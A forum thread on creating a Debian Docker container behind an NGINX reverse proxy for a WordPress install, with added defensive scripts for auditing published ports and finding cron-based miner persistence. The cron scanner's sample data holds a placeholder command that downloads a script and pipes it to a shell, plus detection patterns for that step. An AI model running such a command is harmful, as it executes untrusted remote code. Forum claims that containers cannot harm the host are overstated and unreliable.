How to create Docker's container and enter its shell [Basic container for any-usage]
#1
I didn't plan to post this guide because it wasn't intended to be one. But since @deanhills split the post... here we go :)


So, on @Mashiro's topic about setting up a WP from scratch I wrote a simple command list to create a container... Why? I think that nowadays it is important to isolate any application because there could be any CVE that can hurt our precious VPS!

BEWARE: CONTAINERS ARE NOT SECURITY TOOLS. YOU MUST SECURE YOURSELF BY CONFIGURING STRONG PROTECTION AGAINST ATTACKS

So, why create a container?
Let's imagine that we were running a Laravel web application and someone used the latest known CVE to inject into our machine a cryptominer known as kdevtmpfsi. The cryptominer is a cron-job script that checks if the miner process is running; if not, it will download the binaries and run them. If you kill it... it will just respawn.

To get rid of the cryptominer you must FIND the faulty cronjob and delete it. Then you can hope that by deleting the binaries it will not respawn. I had personal experience with such a miner and it was a pain. My friend's application was running on bare hardware and the miner got injected into the main system...

If the application were running inside a container the solution could be very fast: just destroy and recreate the container! I mean, we were still vulnerable but the recovery process was much faster, as I have already said: containers aren't security tools!

Now, for example, what if we want to run WP from scratch but inside a container? How can we do such a complex thing? Don't worry... using a container is as easy as using a normal terminal connection :)

A basic way to create a basic container ready for any usage is:
    docker run -it -d --name debian -p 9090:80 debian:latest
  • "docker run": creates a new container;
  • "-it": tags the container as an interactive one, you can access its shell;
  • "-d": tags the container as detachable, it will not block your terminal once started;
  • "--name debian": names the container for easy handling;
  • "-p 9090:80": it binds your host port to the port of the container, very useful if we want to host services that require ports... such as Web services!;
  • "debian:latest": points to the latest stable, Buster.
Once the container is up you can access it in 2 ways:
  • Attach using 
    docker attach debian
  • Detach using the combination: CTRL+P + CTRL+Q
Or
  • Attach using 
    docker exec -it debian /bin/bash
  • Detach using the combination CTRL+C or the command exit


Now, inside the container shell you can just follow @Mashiro's tutorial 1:1 with commands, there are no differences!

After everything is set up, you must create a reverse proxy that points to the container...
Because @Mashiro used NGINX I will provide below a simple reverse-proxy configuration for our example case:

server {
    listen      80;
    server_name your_prefered_domain;

    location / {
        # Forward requests to the port published by the container (-p 9090:80)
        proxy_pass http://127.0.0.1:9090;
        proxy_set_header Host              $host;
        proxy_set_header X-Real-IP         $remote_addr;
        proxy_set_header X-Forwarded-For   $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header X-Forwarded-Host  $host;
        proxy_set_header X-Forwarded-Port  $server_port;
    }
}
This reverse proxy is very basic, for example it lacks an HTTPS redirect... but that is not the goal of this tutorial :)

I know that this container is not optimal, there is no persistence but it gives you a bit of "security" and doesn't require much Docker knowledge.
Thanks to Post4VPS and Bladenode for VPS 14
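Added example (not part of the original post): `-p 9090:80` publishes the container port on every host address, so port 9090 is reachable directly as well as through the NGINX proxy, while `-p 127.0.0.1:9090:80` keeps it behind the proxy. The script below flags all-interface bindings in `docker ps` output; the function names and the sample rows are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread: list container ports that are published
# on every host interface and are therefore reachable without the reverse proxy.

# Constructed sample of: docker ps --format '{{.Names}}\t{{.Ports}}'
sample_docker_ps() {
    printf 'debian\t0.0.0.0:9090->80/tcp, :::9090->80/tcp\n'
    printf 'wp-loopback\t127.0.0.1:9090->80/tcp\n'
    printf 'db\t3306/tcp\n'
}

# Reads "<name><TAB><ports>" rows on stdin and prints one row per mapping whose
# host address is a wildcard: "<name><TAB><mapping><TAB>ALL-INTERFACES".
# Entries without "->" are exposed but not published, so they are skipped.
audit_published_ports() {
    awk -F '\t' '
    {
        n = split($2, maps, /, */)
        for (i = 1; i <= n; i++) {
            m = maps[i]
            if (m !~ /->/) continue
            host = m;    sub(/->.*$/, "", host)
            addr = host; sub(/:[0-9-]+$/, "", addr)
            if (addr == "0.0.0.0" || addr == "::" || addr == "[::]")
                printf "%s\t%s\tALL-INTERFACES\n", $1, m
        }
    }'
}

# Demo on the constructed rows. On a real host:
#   docker ps --format '{{.Names}}\t{{.Ports}}' | audit_published_ports
# A flagged container can be recreated with a loopback-only mapping:
#   docker run -it -d --name debian -p 127.0.0.1:9090:80 debian:latest
sample_docker_ps | audit_published_ports
```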
#2
(05-23-2021, 11:58 AM)LightDestory Wrote: I will try to write a tutorial about reverse proxy as soon as I got some time.

I know that this container is not optimal, there is no persistence but it gives you a bit of "security" and doesn't require much Docker knowledge.
Hi @LightDestory  I've moved your tutorial about how to set up a WP Blog with Debian 10, Nginx, php 8.0 and MariaDB with a Docker Container to a new thread. Technically your above tutorial for using a Docker container instead of the command line - I'm sure this was not your intention - was hijacking Mashiro's tutorial.  So if you want to do a tutorial with Docker, it is better to create this under a separate heading like I've done for you now. If you want me to change the title of the tutorial, please let me know. 

As you know, Mashiro is a Docker specialist himself however did what he did for helping me when I asked for help with a tutorial from the command line.  I was unable to find any tutorials that worked for me on the Web - so Mashiro showed how it could be done (step by step with no steps missed), which was almost like rising to the challenge - which I greatly appreciated. 

I've been watching Docker from a distance and I'm sure there are others like me who are very interested in a tutorial that shows us step by step (with no steps missed) how to set up a container with an instance of Debian 10, Nginx, PHP 8.0 and MariaDB in it and how to run WordPress on it.  If you have time to do a detailed step by step tutorial (with no steps missed) like Mashiro did in the tutorial from the command line it will be greatly appreciated.  You can do it in this thread. Big Grin

To be honest, the above tutorial by you is not detailed enough for a beginner.  I'd like to see introductory steps of where you get Docker from.  How do you create the container (step by step). How does the container work?  Do you start it on a fresh install of an OS, or can you install it on a current install.  What steps do you follow to load Debian, Nginx, etc in the container and how do you create the WP Blog in the container.  Then how do you publish the blog.  Your tutorial may be good for other Docker geeks, but for me I wouldn't know where to start to add Debian and all the other software to the container, and then how one gets the final product to show on the Web.  I get it that Docker is a snapshot of something (in a container), but I can't get how it works vs how it works from the command line.  I can't visualize it. I'd need a step by step (with no steps missed) tutorial to be able to do it, and also to understand what I am doing.
Thank you to Post4VPS and VirMach for my awesome VPS 9!  
#3
To echo @deanhills, I'd honestly love to see a tutorial on Docker, I tried taking a few YouTube courses on it and honestly could not figure out how to set up my docker file.
Thank you to CubeData and Posts4VPS for the services of VPS 8.
#4
I am going to edit the post to properly set a topic.

The aim of my instructions was just to create a container ready to be used for CLI installations :)
Thanks to Post4VPS and Bladenode for VPS 14
#5
Thanks VERY much for the tutorial @LightDestory.  So for someone who hasn't worked with Docker before (apologies in advance if the questions are too basic).  I have some questions to ask from an experienced user:

1. Is it possible to dockerize/containerize an existing application?  I.e. can I create docker on a system that already has an application running with Debian, and then somehow move the application into a container?  Or is it better to start the container from scratch with a freshly installed OS?

2. Can one have docker with containers PLUS other applications from the command line, or does one have to install docker from scratch on a fresh installation of an OS and then following that all applications need to be run in separate containers.  

3. How safe and secure is Docker itself?  I get a feeling of it being a panel of sorts where containers are attached and detached.

4. What is the difference between a container and backup?  I get it that a container is a shell of sorts in which the software associated with the application has been captured as well, so when you transport the container the software doesn't need to be reinstalled again.  But for me it has the same feel as a backup plugin of WordPress, except Docker container is possibly more secure.
Thank you to Post4VPS and VirMach for my awesome VPS 9!  
#6
(05-27-2021, 07:02 PM)deanhills Wrote: Thanks VERY much for the tutorial @LightDestory.  So for someone who hasn't worked with Docker before (apologies in advance if the questions are too basic).  I have some questions to ask from an experienced user:

1. Is it possible to dockerize/containerize an existing application?  I.e. can I create docker on a system that already has an application running with Debian, and then somehow move the application into a container?  Or is it better to start the container from scratch with a freshly installed OS?

2. Can one have docker with containers PLUS other applications from the command line, or does one have to install docker from scratch on a fresh installation of an OS and then following that all applications need to be run in separate containers.  

3. How safe and secure is Docker itself?  I get a feeling of it being a panel of sorts where containers are attached and detached.

4. What is the difference between a container and backup?  I get it that a container is a shell of sorts in which the software associated with the application has been captured as well, so when you transport the container the software doesn't need to be reinstalled again.  But for me it has the same feel as a backup plugin of WordPress, except Docker container is possibly more secure.

  1. Docker can be installed anytime, no need to have a freshly installed OS. Regarding your question about moving the application... well... it works that way. If someone has an application running on the bare hardware, you simply decide to move it inside Docker. This transition can be easy or complex because it depends on the application you are talking about. But Docker can containerize almost anything, you just need to study the "Dockerfile" specification and if you want to set up stacks (MYSQL-NGINX-PHP-WP, for example) you can use "docker-compose", which lets you create everything with just a "docker-compose up" command and a provided docker-compose.yml file!
    In this tutorial I didn't use any Dockerfile because it was related to @Mashiro's advice to do it from scratch to learn the components behind WP.
  2. Docker is just an application that runs other applications. It is not an OS or other low-level tool. You can have Docker and other applications and they can co-exist. If you want to create an inter-connection between the applications (containerized or host-installed) you can set up a virtual network on which Docker can communicate. For example you can have WP and MYSQL in different containers but they can communicate; if WP goes down... your MYSQL is untouched and you only need to re-create WP. 
    In this tutorial I said that the container was not optimal because we were abusing it. Installing every component of an application stack such as WP in the same container is not a good practice... but creating different containers and making them communicate is not a 0-knowledge thing.
  3. Docker is safe, it will not hurt your system anyway. Starting a container is like running an application in the background. If you want to interact with it you need to enter its shell or manage it via a WEB PANEL, such as Portainer.io. 
    I used the -d parameter because without it that command would "block" your terminal because the container will take control of it. If you close that terminal the container will shut down... we don't want that... so with -d we say: "you must stay running in the background, when I need you I will perform an attach".
  4. A container is not a backup... it is an application running inside a sandbox... it means it can't see anything other than itself. It can't damage your hosting system. For example on a Debian VPS you can run a CentOS container and you will see a total RPM-based system... CentOS is likely not to know it is a container. Generally you don't copy and paste a container, you use a Dockerfile to create a new instance of that application (container).  

I tried to be as friendly as possible, I didn't talk about namespaces, cgroups and so on because those are more technical concepts. @Mashiro, if you can explain it more easily you are welcome.
Thanks to Post4VPS and Bladenode for VPS 14
#7
I'll do a couple of posts in this thread. The first would be a quick review of the OP highlighting the main issues I had reading it. The second will address @deanhills' questions and @LightDestory's answers to them. Maybe later on, I'll open a more comprehensive thread on Linux containers and where Docker containers rank among them.

Here I won't go back to my previous principled objection (made elsewhere on this board) to using Docker inside a KVM VPS and just go along with the assumption that the resources are good enough to get everything running smoothly.

Okay, now, for the OP's review. I understand that it wasn't planned to be a stand-alone topic from its intro. but still the whole OP fails on so many points that I can't just let it pass un-annotated--at least not under my watch :-)

1- The Why Docker Container Part:
(05-23-2021, 11:58 AM)LightDestory Wrote: So, on @Mashiro's topic about setting up a WP from scratch I wrote a simple command list to create a container... Why? I think that nowadays it is important to isolate any application because there could be any CVE that can hurt our precious VPS!

BEWARE: CONTAINERS ARE NOT SECURITY TOOLS. YOU MUST SECURE YOURSELF BY CONFIGURING STRONG PROTECTION AGAINST ATTACKS

So, why create a container?
Let's imagine that we were running a Laravel web application and someone used the latest known CVE to inject into our machine a cryptominer known as kdevtmpfsi. The cryptominer is a cron-job script that checks if the miner process is running; if not, it will download the binaries and run them. If you kill it... it will just respawn.

To get rid of the cryptominer you must FIND the faulty cronjob and delete it. Then you can hope that by deleting the binaries it will not respawn. I had personal experience with such a miner and it was a pain. My friend's application was running on bare hardware and the miner got injected into the main system...

If the application were running inside a container the solution could be very fast: just destroy and recreate the container! I mean, we were still vulnerable but the recovery process was much faster, as I have already said: containers aren't security tools!

From the above we deduce that the main incentive in using Docker containers here is the isolated, ephemeral and statelessness of the Docker container that makes it disposable, i.e. just throw the container away and spin up another one.

Nothing wrong there, in fact, it's perfectly what Docker containers are designed for:
> Docker containers are "ephemeral, stateless, minimal containers that won’t typically get upgraded or re-configured but instead just be replaced entirely."

Although I did sense a bit of confusion in this part of the last paragraph:
(05-23-2021, 11:58 AM)LightDestory Wrote: If the application were running inside a container the solution could be very fast: just destroy and recreate the container! I mean, we were still vulnerable but the recovery process was much faster, as I have already said: containers aren't security tools!

It might be due to a lack of a clear view of what a container is really all about?!.. A container can be mentally viewed as a process tree running inside its own namespace (hence the isolated environment); the malware resides(/confined) somewhere in that process tree. Once the container is destroyed, ie the process tree killed, the malware is killed too from within.. That simple!

2- The Docker Container Creation Part:
(05-23-2021, 11:58 AM)LightDestory Wrote: Now, for example, what if we want to run WP from scratch but inside a container? How can we do such a complex thing? Don't worry... using a container is as easy as using a normal terminal connection :)

A basic way to create a basic container ready for any usage is:
docker run -it -d --name debian -p 9090:80 debian:latest
(.................)

Now, inside the container shell you can just follow @Mashiro's tutorial 1:1 with commands, there are no differences!

Unfortunately this part is all wrong!.. And I don't recommend using it at all!.. Nothing in it makes sense as far as Docker container best practices go.

The example above downloads a Docker Debian-latest image and runs it on the fly in interactive mode to gain access to the shell, from which it asks you to follow @Mashiro's tutorial!!..

Well, goodbye to the minimal container part that the Docker container definition is based on.

Even more, goodbye to the ephemeral and stateless argument that the whole OP is based on (re-read section 1 about the CVE stuff and spinning up containers at will.) If each time we want to recreate our container after a malware infection we have to go through the whole of @Mashiro's tutorial again!!!.. I would say that we didn't gain anything in this process, we just added the extra Docker part to @Mashiro's already lengthy tutorial!..

Remember, we've said that:
> Docker containers are "ephemeral, stateless, minimal containers that won’t typically get upgraded or re-configured but instead just be replaced entirely."

So, what's the solution?.. If we really want to do what the OP suggested, then we need to use a system container (like LXD/LXC containers) not an application container like Docker containers.

But if we still want to stick with Docker, then we need to create 2 Docker images: one for a database, i.e. MySQL/MariaDB, and one for the Nginx/PHP+WP or Apache/PHP+WP.

Both types of images are already available online but I will advise people to create their own Docker images by familiarizing themselves with Dockerfiles (pretty easy to pick up on.)

That should be all till Post_2.
VirMach's Buffalo_VPS-9 Holder (Dec. 20 - July 21)
microLXC's Container Holder (july 20 - ?)
VirMach's Phoenix_VPS-9 Holder (Apr. 20 - June 20)
NanoKVM's NAT-VPS Holder (jan. 20 - ?)
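Added example (not from any poster in the thread): the clean-up step quoted from the opening post, finding the cron entry that keeps re-fetching the miner, written as a scan over Debian's crontab locations. The function names, the sample crontab and the two match patterns are constructed here as simple heuristics; they are not a signature for kdevtmpfsi.

```shell
#!/bin/sh
# Added example, not from the thread: find cron entries that re-download or
# re-launch a binary, the persistence the opening post describes.

# Constructed crontab text; the URL and the paths are placeholders.
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
* * * * * wget -q -O - http://example.invalid/unk.sh | sh >/dev/null 2>&1
*/1 * * * * /var/tmp/placeholder-miner
EOF
}

# Reads crontab text on stdin and prints "<reason><TAB><entry>" for entries that
# pipe a download into a shell or run something from a world-writable directory.
scan_cron_text() {
    awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    {
        reason = ""
        if ($0 ~ /(curl|wget)[^|;&]*\|[ \t]*(ba|da)?sh/)
            reason = "fetch-piped-to-shell"
        else if ($0 ~ /(^|[ \t;&|])\/(tmp|var\/tmp|dev\/shm)\/[^ \t]+/)
            reason = "runs-from-world-writable-dir"
        if (reason != "") printf "%s\t%s\n", reason, $0
    }'
}

# Scans the system and per-user crontabs under an optional root prefix and
# prefixes each hit with the file it came from. Run as root so that the
# per-user files in /var/spool/cron/crontabs are readable.
scan_cron_locations() {
    root="${1:-}"
    for f in "$root/etc/crontab" "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/crontabs/*; do
        [ -f "$f" ] && [ -r "$f" ] || continue
        scan_cron_text < "$f" | while IFS= read -r hit; do
            printf '%s\t%s\n' "$f" "$hit"
        done
    done
}

# Demo on the constructed crontab; on a real host call: scan_cron_locations
sample_crontab | scan_cron_text
```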
#8
(06-04-2021, 07:13 AM)fChk Wrote: I'll do a couple of posts in this thread. The first would be a quick review of the OP highlighting the main issues I had reading it. The second will address @deanhills' questions and @LightDestory's answers to them. Maybe later on, I'll open a more comprehensive thread on Linux containers and where Docker containers rank among them.

Here I won't go back to my previous principled objection (made elsewhere on this board) to using Docker inside a KVM VPS and just go along with the assumption that the resources are good enough to get everything running smoothly.

Okay, now, for the OP's review. I understand that it wasn't planned to be a stand-alone topic from its intro. but still the whole OP fails on so many points that I can't just let it pass un-annotated--at least not under my watch :-)

1- The Why Docker Container Part:

From the above we deduce that the main incentive in using Docker containers here is the isolated, ephemeral and statelessness of the Docker container that makes it disposable, i.e. just throw the container away and spin up another one.

Nothing wrong there, in fact, it's perfectly what Docker containers are designed for:
> Docker containers are "ephemeral, stateless, minimal containers that won’t typically get upgraded or re-configured but instead just be replaced entirely."

Although I did sense a bit of confusion in this part of the last paragraph.

It might be due to a lack of a clear view of what a container is really all about?!.. A container can be mentally viewed as a process tree running inside its own namespace (hence the isolated environment); the malware resides(/confined) somewhere in that process tree. Once the container is destroyed, ie the process tree killed, the malware is killed too from within.. That simple!

2- The Docker Container Creation Part:

Unfortunately this part is all wrong!.. And I don't recommend using it at all!.. Nothing in it makes sense as far as Docker container best practices go.

The example above downloads a Docker Debian-latest image and runs it on the fly in interactive mode to gain access to the shell, from which it asks you to follow @Mashiro's tutorial!!..

Well, goodbye to the minimal container part that the Docker container definition is based on.

Even more, goodbye to the ephemeral and stateless argument that the whole OP is based on (re-read section 1 about the CVE stuff and spinning up containers at will.) If each time we want to recreate our container after a malware infection we have to go through the whole of @Mashiro's tutorial again!!!.. I would say that we didn't gain anything in this process, we just added the extra Docker part to @Mashiro's already lengthy tutorial!..

Remember, we've said that:
> Docker containers are "ephemeral, stateless, minimal containers that won’t typically get upgraded or re-configured but instead just be replaced entirely."

So, what's the solution?.. If we really want to do what the OP suggested, then we need to use a system container (like LXD/LXC containers) not an application container like Docker containers.

But if we still want to stick with Docker, then we need to create 2 Docker images: one for a database, i.e. MySQL/MariaDB, and one for the Nginx/PHP+WP or Apache/PHP+WP.

Both types of images are already available online but I will advise people to create their own Docker images by familiarizing themselves with Dockerfiles (pretty easy to pick up on.)

That should be all till Post_2.

Thanks for taking the time to reply to this post, but please read Mashiro's post too to understand the nature of this topic.

As you said, it was an unscheduled tutorial, I didn't prepare any good material for it. 

I know, and already said in the OP, that this configuration was not optimal.
Quote:In this tutorial I said that the container was not optimal because we were abusing it. Installing every component of an application stack such as WP in the same container is not a good practice... but creating different containers and making them communicate is not a 0-knowledge thing.

When I mentioned Docker in Mashiro's post, I was told that using Docker was a no-learning process because it was a nice exercise to set up the entire application stack from scratch. So... I edited this tutorial with that in mind: allowing the user to perform that guide inside a container.

It is not good practice to abuse the container like that, but if you destroy the container you delete the volatile volume linked to that container and so you will delete both your data and the miner binary. I wanted to set up a "data" volume but it was beyond the level of a new user. Moreover, I didn't suggest the mount-fs-to-volume option because it is dangerous if the miner binary or scripts get on your VPS.

Do you expect someone new to Docker, such as @deanhills, to master the concepts of persistent volumes, internal networking and container composition with docker-compose from a simple forum post? These skills need time to master and a lot of trial and error to get the confidence to make them work without any issue. Copy-pasting a configuration from GitHub will make it work but you will have 0 knowledge of how it is working. If someday you want to build something different, such as a data pipeline where a LOT of software needs to communicate, you will need the knowledge!

If I wanted to do a complete tutorial of WP+MySQL on Docker I would not do much in writing it, because GitHub is FULL of compositions for this stack; moreover Mashiro has already written about Portainer.io and it has a stack template for WP. I would suggest using Portainer and learning how it configures that stack; it creates an internal network and has good healthchecks for the containers.
Thanks to Post4VPS and Bladenode for VPS 14
#9
(06-07-2021, 04:51 PM)LightDestory Wrote: Thanks for taking the time to reply to this post, but please read Mashiro's post too to understand the nature of this topic.

[...]

Do you expect someone new to Docker, such as @deanhills, to master the concepts of persistent volumes, internal networking and container composition with docker-compose from a simple forum post? These skills need time to master and a lot of trial and error to get the confidence to make them work without any issue. Copy-pasting a configuration from GitHub will make it work but you will have 0 knowledge of how it is working. If someday you want to build something different, such as a data pipeline where a LOT of software needs to communicate, you will need the knowledge!

If I wanted to do a complete tutorial of WP+MySQL on Docker I would not do much in writing it, because GitHub is FULL of compositions for this stack; moreover Mashiro has already written about Portainer.io and it has a stack template for WP. I would suggest using Portainer and learning how it configures that stack; it creates an internal network and has good healthchecks for the containers.

@LightDestory I totally agree with your points.  I also appreciate @fChk's contribution in that he highlighted the security issues with the simple container version.  My understanding from what he contributed is that if you want to do Docker as it is intended to be used, a VPS is probably not the right vehicle for it.  Possibly it's OK with our large spec VPSs like VPS 9.  But for smaller VPSs one would save a lot of resources and also it would be more secure to work from the command line, rather than install containers from the Docker repository.
Thank you to Post4VPS and VirMach for my awesome VPS 9!  
#10
(06-07-2021, 04:51 PM)LightDestory Wrote: When I mentioned Docker in Mashiro's post, I was told that using Docker was a no-learning process because it was a nice exercise to set up the entire application stack from scratch. So... I edited this tutorial with that in mind: allowing the user to perform that guide inside a container.
I disagree!.. There is plenty of basic (and not-so-basic) knowledge worth spreading while writing(/teaching) about Docker container technology!.. It just needs you to have enough background on the subject with hands-on experience, while avoiding too much jargon that distracts readers, automation tools that obfuscate the subject and unnecessary topics at this level like composition, scheduling and orchestration etc.. The rest is doable even for newbies.

(06-07-2021, 04:51 PM)LightDestory Wrote: When I mentioned Docker in Mashiro's post, I was told that using Docker was a no-learning process because it was a nice exercise to set up the entire application stack from scratch. So... I edited this tutorial with that in mind: allowing the user to perform that guide inside a container.
I think I'm aware of the circumstances in which this tutorial came into being but in any case the result (ie the OP) did a lot of injustice to the whole notion of Docker containers given the hasty way in which it was written.

You see, to my mind, the OP's only real use-case was as a tip to a developer sitting in front of his/her laptop testing @Mashiro's tutorial inside a container then destroying it when everything checks OK!.. Thus it's a way for developers to:
> avoid messing up their own system (if they are using Debian 10) or
> avoid using a full-fledged KVM VM to do that testing instead.

If that's your intention from this tutorial then you should write it in the introduction of the OP for everybody to read and be aware of to avoid having the wrong idea about how Docker containers are run in production.

A better (more didactic) way is to first introduce Docker: what is it? what is it for? and then, and only then, how is it used?
VirMach's Buffalo_VPS-9 Holder (Dec. 20 - July 21)
microLXC's Container Holder (july 20 - ?)
VirMach's Phoenix_VPS-9 Holder (Apr. 20 - June 20)
NanoKVM's NAT-VPS Holder (jan. 20 - ?)